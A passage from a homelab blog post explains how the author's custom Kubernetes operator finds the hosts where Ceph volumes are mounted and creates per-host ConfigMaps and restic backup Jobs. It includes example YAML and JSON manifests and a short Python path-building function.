up. Here is an example I used for my tests:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabServiceBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-service-backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">runNow</span>: <span style="color:#e6db74">&#34;12&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupBucketName</span>: <span style="color:#e6db74">&#34;backup-operator-testing&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mysql-pv-claim</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-pv-claim</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">service-backup-test</span>
</span></span></code></pre></div><p>This object instructs my operator to back up the MySQL and WordPress volumes
of a WordPress deployment I launched just for testing purposes. It also contains
an S3 bucket that&rsquo;s not used by the deployment and just exists to test that part
of the operator.</p>
<h2 id="high-level-overview">High level overview</h2>
<p>Alright, let&rsquo;s assume that we&rsquo;ve go the above example HomelabServiceBackup (HLSB).
What do I want to happen when a backup is triggered?</p>
<p>On the most basic level, I want two things to happen:</p>
<ol>
<li>The two <code>pvc</code> type entries in the <code>spec.backups</code> list are run through restic
to back them up. This means the backup needs access to those volumes.</li>
<li>The <code>s3</code> type bucket is downloaded to a temporary location, and then restic
is run on that temporary location to make an incremental backup of the bucket.</li>
</ol>
<p><strong>BAD THINGS.</strong> This paragraph is the &ldquo;Do as I say, not as I do&rdquo; part of this
post. First of all, running backups on live data is generally a bad idea. You
might end up with inconsistent state in your backup.
Second, there are perfectly good block-level backup capabilities right in Ceph.
With consistency guarantees. But I don&rsquo;t like those. They basically require a
second Ceph cluster as a backup target.
<strong>To reiterate:</strong> What I&rsquo;m doing here is bad. And I know that what I&rsquo;m doing
here is bad. It&rsquo;s working for me, but I&rsquo;m really not advising you to do the same
thing. That&rsquo;s the main reason I will likely never publish the operator I wrote -
I just don&rsquo;t think it&rsquo;s a good idea.</p>
<p>With that out of the way, which steps need to be completed?</p>
<ol>
<li>Determine where each of the <code>pvc</code> type volumes is mounted</li>
<li>Split the volumes into groups by the host they&rsquo;re currently mounted on</li>
<li>For each of those groups:
<ul>
<li>Create a ConfigMap with the configuration for that particular group</li>
<li>Create a Job for each group and launch them, in sequence</li>
</ul>
</li>
<li>Determine whether all jobs were successful and update the HLSB object in the
k8s cluster</li>
</ol>
<p>The HLSB object has a <code>status.state</code> property, which can be one of:</p>
<ul>
<li><code>Running</code></li>
<li><code>Success</code></li>
<li><code>Failed</code></li>
</ul>
<p>These are then later used by a Grafana panel using Prometheus data from
kube-state-metrics to show whether all of the backup were successful.</p>
<p>Now let&rsquo;s have a closer look at the above steps.</p>
<h2 id="implementation-details">Implementation details</h2>
<h3 id="finding-volumes-and-hosts">Finding volumes and hosts</h3>
<p>Let&rsquo;s look at the backup list from the example HLSB above again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">backups</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mysql-pv-claim</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">pvc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-pv-claim</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testing</span>
</span></span></code></pre></div><p>I&rsquo;m ignoring the <code>s3</code> type entry here, because quite frankly, it&rsquo;s not that
interesting.</p>
<p>For the <code>pvc</code> type entries, the very first step is to determine on which host
they&rsquo;re currently mounted. Because the PVC might be RWO, we cannot just mount
them to the backup Pod while the app using it is already running. Instead,
I will use a <a href="https://kubernetes.io/docs/concepts/storage/volumes/#hostpath">hostPath</a>
volume, to mount the directory where the Ceph CSI provider mounts the volumes
into the Backup container.</p>
<p>For that to work, I need to know on which host the volume is actually mounted.
And for apps having multiple pods and associated volumes, these may be multiple
hosts. Which presents yet another challenge: Restic, when backing up to a
repository, locks that repository, so there can only ever be a single writer.
My backup buckets are separated by app, so even if an app has multiple volumes
defined, like the example above, I can only ever run one backup in parallel.
If multiple volumes happen to be mounted on a single host, that&rsquo;s not a problem.
The backup Job for that host can backup all of them. But if they happen to be mounted
on separate hosts, there need to be multiple Jobs, running one after the other.</p>
<p>So how to get the volumes? With the Kubernetes API. As input for our journey,
we&rsquo;ve got the PVC defined, with its name and namespace, in the list of things
to backup.</p>
<p>So the first action is to fetch the PVC via the Kubernetes API. Because I&rsquo;m
writing async code in Kopf, I&rsquo;m using <a href="https://github.com/tomplus/kubernetes_asyncio">kubernetes_asyncio</a>
instead of the official Kubernetes Python lib.</p>
<p>Here&rsquo;s what the PVC looks like, with the <code>wp-pv-claim</code> from the example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;PersistentVolumeClaim&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;app&#34;</span>: <span style="color:#e6db74">&#34;wordpress&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;app.kubernetes.io/managed-by&#34;</span>: <span style="color:#e6db74">&#34;Helm&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;testing&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;wp-pv-claim&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;testing&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;resources&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;requests&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;storageClassName&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeMode&#34;</span>: <span style="color:#e6db74">&#34;Filesystem&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeName&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;capacity&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;phase&#34;</span>: <span style="color:#e6db74">&#34;Bound&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I removed a couple of pieces which aren&rsquo;t that interesting. With this info in
hand, we can go to the next step, fetching the PersistentVolume backing this
claim. This can also be done pretty easily with the <code>read_persistent_volume</code>
API, which only needs a name as input, because PersistentVolumes are cluster
level resources. The name of the volume backing the claim can be taken from
the <code>spec.volumeName</code> property.</p>
<p>The result for the above PVC would look like this, again with unimportant bits
removed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;PersistentVolume&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;accessModes&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;ReadWriteOnce&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;capacity&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;storage&#34;</span>: <span style="color:#e6db74">&#34;10Gi&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;csi&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;controllerExpandSecretRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;rook-csi-rbd-provisioner&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;driver&#34;</span>: <span style="color:#e6db74">&#34;rook-ceph.rbd.csi.ceph.com&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;fsType&#34;</span>: <span style="color:#e6db74">&#34;ext4&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;nodeStageSecretRef&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;rook-csi-rbd-node&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;volumeAttributes&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;clusterID&#34;</span>: <span style="color:#e6db74">&#34;rook-cluster&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;imageFeatures&#34;</span>: <span style="color:#e6db74">&#34;layering,exclusive-lock,object-map,fast-diff&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;imageName&#34;</span>: <span style="color:#e6db74">&#34;csi-vol-3361c6d5-4269-4ab2-bc14-771420b768a7&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;journalPool&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;pool&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;volumeHandle&#34;</span>: <span style="color:#e6db74">&#34;0001-000c-rook-cluster-0000000000000003-3361c6d5-4269-4ab2-bc14-771420b768a7&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;persistentVolumeReclaimPolicy&#34;</span>: <span style="color:#e6db74">&#34;Retain&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;storageClassName&#34;</span>: <span style="color:#e6db74">&#34;rbd-bulk&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;volumeMode&#34;</span>: <span style="color:#e6db74">&#34;Filesystem&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;phase&#34;</span>: <span style="color:#e6db74">&#34;Bound&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>One potentially useful side-note: The <code>spec.csi.volumeAttributes.imageName</code>
property is the name of the backing RBD volume in Ceph.</p>
<p>The third thing we need is the <a href="https://kubernetes.io/docs/reference/kubernetes-api/config-and-storage-resources/volume-attachment-v1/">VolumeAttachment</a>
for the PersistentVolume, which tells us where it is currently mounted.
Sadly, these don&rsquo;t have an API to find the attachment for a given
PersistentVolume (or multiple attachments of the same volume, if it is RWX).
So instead, I&rsquo;m fetching all of the attachments with the <code>list_volume_attachments</code>
API. This one, again, is not namespaced.
Here is the current attachment for the above PersistentVolume:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;storage.k8s.io/v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;VolumeAttachment&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;creationTimestamp&#34;</span>: <span style="color:#e6db74">&#34;2024-12-29T10:44:46Z&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;csi-8aee698fd97659b400535fa69969815fad87d2b761d69625d04afc95d53bf252&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;resourceVersion&#34;</span>: <span style="color:#e6db74">&#34;152545692&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;uid&#34;</span>: <span style="color:#e6db74">&#34;6cbe234b-e2c7-4596-a4b6-03d66eb45f5f&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;attacher&#34;</span>: <span style="color:#e6db74">&#34;rook-ceph.rbd.csi.ceph.com&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;nodeName&#34;</span>: <span style="color:#e6db74">&#34;sehith&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;source&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;persistentVolumeName&#34;</span>: <span style="color:#e6db74">&#34;pvc-733b8bc9-0a44-446c-a736-3d97ba52f01f&#34;</span>
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;status&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;attached&#34;</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The <code>spec.nodeName</code> provides us with what we need: The name of the host where
the volume is currently mounted.</p>
<p>Next, how to figure out which <code>hostPath</code> to use to mount that volume into the
backup container? That&rsquo;s done with this small Python function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">get_ceph_csi_host_path</span>(pv):
</span></span><span style="display:flex;"><span>    volume_handle <span style="color:#f92672">=</span> pv<span style="color:#f92672">.</span>spec<span style="color:#f92672">.</span>csi<span style="color:#f92672">.</span>volume_handle
</span></span><span style="display:flex;"><span>    driver <span style="color:#f92672">=</span> pv<span style="color:#f92672">.</span>spec<span style="color:#f92672">.</span>csi<span style="color:#f92672">.</span>driver
</span></span><span style="display:flex;"><span>    vol_id_digest <span style="color:#f92672">=</span> sha256(bytes(volume_handle, <span style="color:#e6db74">&#39;utf-8&#39;</span>))<span style="color:#f92672">.</span>hexdigest()
</span></span><span style="display:flex;"><span>    p <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span><span style="color:#f92672">.</span>join([
</span></span><span style="display:flex;"><span>        CSI_MOUNT_PREFIX,
</span></span><span style="display:flex;"><span>        driver,
</span></span><span style="display:flex;"><span>        vol_id_digest,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;globalmount&#34;</span>,
</span></span><span style="display:flex;"><span>        volume_handle
</span></span><span style="display:flex;"><span>    ])
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> p
</span></span></code></pre></div><p>It takes the PersistentVolume as input, as well as the <code>CSI_MOUNT_PREFIX</code>, which
is <code>/var/lib/kubelet/plugins/kubernetes.io/csi</code>. In addition, there is a hash of
the <code>spec.csi.volume_handle</code> in the path. The full mount path looks like this:</p>
<pre tabindex="0"><code>/var/lib/kubelet/plugins/kubernetes.io/csi/rook-ceph.rbd.csi.ceph.com/fb3f47df032796f8ee3f021a858f09772c60bf6b30a75288a4887852a59b071f/globalmount/0001-000c-rook-cluster-0000000000000003-3361c6d5-4269-4ab2-bc14-771420b768a7
</code></pre><p>And yes, for some reason the path contains the volume&rsquo;s <code>volume_handle</code> once in
plain form, and once in hashed form. No idea what&rsquo;s the reason behind that.
Plus, it&rsquo;s worth noting that this is specific to the Ceph CSI driver. The
paths for other drivers would look different.</p>
<h3 id="creating-the-configuration-file">Creating the configuration file</h3>
<p>Because we&rsquo;ve only got two volumes in our example HLSB, let&rsquo;s assume that both
of them are mounted on the same host. So this particular backup would only need
to run a single Job. That Job needs to be told what it&rsquo;s supposed to back up,
which I&rsquo;m doing by creating a fresh ConfigMap for the job. An example for the
two volumes in our example HLSB would look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hlsb-conf.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    retention:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      daily: 7
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      monthly: 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      weekly: 6
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      yearly: 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    - name: testing-mysql-pv-claim
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    - name: testing-wp-pv-claim</span>
</span></span></code></pre></div><p>This config describes the retention policy and the volumes for this backup.
The retention policy is one of the shortcuts I took. It&rsquo;s actually more of a
global config, which I would normally provide to the backup Job via environment
variables. But because the retention is not just a simple single value, I
decided that it&rsquo;s just easier to add it to the config file, even though it&rsquo;s not
specific to the currently executed backup Job.</p>
<p>The entries in the <code>volumes:</code> list are the combination of the PVC&rsquo;s namespace+name.
These are also the names of the directories under which they&rsquo;re mounted into
the backup container.</p>
<h3 id="creating-the-job">Creating the Job</h3>
<p>As I&rsquo;ve noted above, each host where one of the app&rsquo;s volumes is mounted gets a
Job. These Jobs only have one Pod, running a relatively simple Python app that
reads the config file and runs <code>restic backup</code> on the mount directories of all
the volumes to be backed up.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;apiVersion&#34;</span>: <span style="color:#e6db74">&#34;batch/v1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;kind&#34;</span>: <span style="color:#e6db74">&#34;Job&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;metadata&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;labels&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;hlsb&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf_backup-audiobookshelf&#34;</span>,
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>        },
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf-backup-audiobookshelf-5746d54b-3826-486d-b33f&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;namespace&#34;</span>: <span style="color:#e6db74">&#34;backups&#34;</span>,
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;backoffLimit&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;completions&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;parallelism&#34;</span>: <span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;template&#34;</span>: {
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;spec&#34;</span>: {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;affinity&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;podAntiAffinity&#34;</span>: {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;requiredDuringSchedulingIgnoredDuringExecution&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;labelSelector&#34;</span>: {
</span></span><span style="display:flex;"><span>                                    <span style="color:#f92672">&#34;matchLabels&#34;</span>: {
</span></span><span style="display:flex;"><span>                                        <span style="color:#f92672">&#34;homelab/part-of&#34;</span>: <span style="color:#e6db74">&#34;hlsb&#34;</span>
</span></span><span style="display:flex;"><span>                                    }
</span></span><span style="display:flex;"><span>                                },
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;topologyKey&#34;</span>: <span style="color:#e6db74">&#34;kubernetes.io/hostname&#34;</span>
</span></span><span style="display:flex;"><span>                            }
</span></span><span style="display:flex;"><span>                        ]
</span></span><span style="display:flex;"><span>                    }
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;containers&#34;</span>: [
</span></span><span style="display:flex;"><span>                    {
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;command&#34;</span>: [
</span></span><span style="display:flex;"><span>                            <span style="color:#e6db74">&#34;hn-backup&#34;</span>,
</span></span><span style="display:flex;"><span>                            <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span><span style="display:flex;"><span>                        ],
</span></span><span style="display:flex;"><span>                        <span style="color:#f92672">&#34;env&#34;</span>: [
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_BACKUP_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SERVICE_HOST&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;s3-k8s.mei-home.net:443&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_BACKUP_BUCKET&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_S3_SCRATCH_VOL_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts/backup-s3-scratch&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_VOL_MOUNT_DIR&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;/hlsb-mounts&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NAME&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;backup-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
</span></span><span style="display:flex;"><span>                            {
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;HLSB_NS&#34;</span>,
</span></span><span style="display:flex;"><span>                                <span style="color:#f92672">&#34;value&#34;</span>: <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>                            },
